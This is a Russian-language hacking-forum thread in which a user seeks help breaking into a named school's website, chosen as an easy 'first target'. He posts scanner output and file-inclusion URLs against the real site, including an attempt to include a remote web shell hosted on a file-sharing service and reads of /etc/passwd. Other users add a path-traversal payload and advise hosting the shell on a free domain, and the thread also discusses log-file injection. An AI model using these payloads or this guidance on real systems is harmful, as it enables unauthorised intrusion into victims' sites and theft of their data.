Взлом сайта: пол дела сделал и застрял.
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
Взлом сайта: пол дела сделал и застрял. - 2010-11-27 23:22:39.903333
|
|
|
Evgenii_Semenov
Сообщений: 11
Оценки: 0
Присоединился: 2010-11-25 01:16:40.403333
|
1)
Я в деле взлома не новичок, но никогда не пробывал взламывать сайты.
перечитал кучу faq'ов но конкретного ответа или даже направления для мысли не нашел. Уже облазил весь форум в поиске ответа, но безрезультатно.
Теперь суть моего вопроса:
просканировав один сайт на уязвимости спайдером, ничего не нашел, но просканировав той же прогой на эксплойты нашел одну уязвимость, вот отчет программы:
—————————————————————————————
Поиск уязвимостей на сервере "www.school-8.com" …
Сервер : nginx
Количество эксплойтов : 726
http://www.school-8.com:80/docs/
Ответ: 200 - OK
Проверено : 726
Найдено уязвимостей : 1
Поиск завершен
—————————————————————————————-
2)
Потом узнал про php include. Данная дыра как я понимаю есть на этом сайте.
http://school-8.com/name112.php?name=news/index.php&news=-5
http://school-8.com/name112.php?name=vshedule/index.php'
Но как загрузить туда shell?
Если верить статьям в интернете, то нужна команда ?file= , а здесь только ?name= , как быть тогда?
Или это не имеет значения?
http://school-8.com/name112.php?name=www.zalil.ru/30033707/4610d8af.4cf0d380/remview.php
вот добавил shell к ссылке(сам заливал, так что линк рабочий), но все равно говорит ошибка при загрузке.
Кажется дело во внешнем или локальном include'е, но в этом я совсем дерево.
3)
http://school-8.com/name112.php?name=/etc/passwd
И вот эту вещь мог бы кто-нибудь разъяснить? Имеет ли данная страница хоть какое-то практическое применение(имеется ввиду для меня)?
|
|
|
|
|
RE: Взлом сайта: пол дела сделал и застрял. - 2010-11-27 23:45:29.856666
|
|
|
DestenyPrO
Сообщений: 271
Оценки: 0
Присоединился: 2010-11-13 23:30:45.656666
|
чем тебе уже школа насолила?
|
|
|
|
|
RE: Взлом сайта: пол дела сделал и застрял. - 2010-11-27 23:51:05.173333
|
|
|
Evgenii_Semenov
Сообщений: 11
Оценки: 0
Присоединился: 2010-11-25 01:16:40.403333
|
Это не моя школа. Я свою давно закончил (точнее пару лет назад)
Этот сайт - объект для атаки, находится в отдаленном маленьком городке на севере России, так что для первого раза идеальный вариант.
А по делу то можешь что-то сказать?
|
|
|
|
|
RE: Взлом сайта: пол дела сделал и застрял. - 2010-11-28 00:09:01.193333
|
|
|
volod1a
Сообщений: 38
Оценки: 0
Присоединился: 2009-06-19 01:23:18.813333
|
http://www.school-8.com/name112.php?name=../../../../../../../../etc/passwd
|
|
|
|
|
RE: Взлом сайта: пол дела сделал и застрял. - 2010-11-28 00:13:59.250000
|
|
|
Evgenii_Semenov
Сообщений: 11
Оценки: 0
Присоединился: 2010-11-25 01:16:40.403333
|
Посмотри пункт 3. в первом посте темы. Это тоже самое, что сделал я, но вопрос в том, что из этого можно вынести?
|
|
|
|
|
RE: Взлом сайта: пол дела сделал и застрял. - 2010-11-28 00:38:54.073333
|
|
|
Evgenii_Semenov
Сообщений: 11
Оценки: 0
Присоединился: 2010-11-25 01:16:40.403333
|
Во всей этой куче ничего не разобрал…Сначала иероглифы, а в конце небольшая часть текста, похожего на /etc/passwd
По поводу первых 2-х пунктов может кто подсказать напрвление?
Хотя больше интересен вариант с заливкой шелла на сайт, так что предпочтительней советы по второму пункту моего сообщения.
|
|
|
|
|
RE: Взлом сайта: пол дела сделал и застрял. - 2010-11-28 01:01:12.993333
|
|
|
Evgenii_Semenov
Сообщений: 11
Оценки: 0
Присоединился: 2010-11-25 01:16:40.403333
|
Статью прочитал. Довольно познавательная, но в ней все основано на возможности аплоада каких-либо файлов (аватар, аттач), а на выбранном мною сайте этого не встретить.
|
|
|
|
|
RE: Взлом сайта: пол дела сделал и застрял. - 2010-11-28 01:19:22.126666
|
|
|
Evgenii_Semenov
Сообщений: 11
Оценки: 0
Присоединился: 2010-11-25 01:16:40.403333
|
ну думаю летитбит не подойдет хотя бы из-за капчи…
А на счет ссылки, которую вы кинули…шелл не загружается, так как находится не на сервере с сайтом, а на внешнем ресурсе.
Как вариант рассматриваю локальную php инъекцию с помощью log файла, но тогда может ли кто нибудь помочь с поиском самого лога?
|
|
|
|
|
RE: Взлом сайта: пол дела сделал и застрял. - 2010-11-28 14:54:52.180000
|
|
|
DestenyPrO
Сообщений: 271
Оценки: 0
Присоединился: 2010-11-13 23:30:45.656666
|
quote:
ORIGINAL: Evgenii_Semenov
ну думаю летитбит не подойдет хотя бы из-за капчи…
ну во первых ссылка ваша, а во вторых етим я хотел донести к вам то что шелл нада заливать типа site.ru/shell.php а не на обменник…
|
|
|
|
|
RE: Взлом сайта: пол дела сделал и застрял. - 2010-11-29 23:23:28.336666
|
|
|
Evgenii_Semenov
Сообщений: 11
Оценки: 0
Присоединился: 2010-11-25 01:16:40.403333
|
все конечно хорошо, но где я возьму этот site.ru ? Не покупать же домен ради такого дела?
|
|
|
|
|
RE: Взлом сайта: пол дела сделал и застрял. - 2010-12-01 04:40:41.656666
|
|
|
krekerden
Сообщений: 75
Оценки: 0
Присоединился: 2010-10-12 18:57:43.446666
|
Бесплатный домен возьми)
|
|
|
|
|
RE: Взлом сайта: пол дела сделал и застрял. - 2010-12-02 00:07:41.653333
|
|
|
Evgenii_Semenov
Сообщений: 11
Оценки: 0
Присоединился: 2010-11-25 01:16:40.403333
|
На ucoz нельзя загружать пхп файлы…думаю на другие тоже нельзя будет…трата времени…
|
|
|
|
|
|
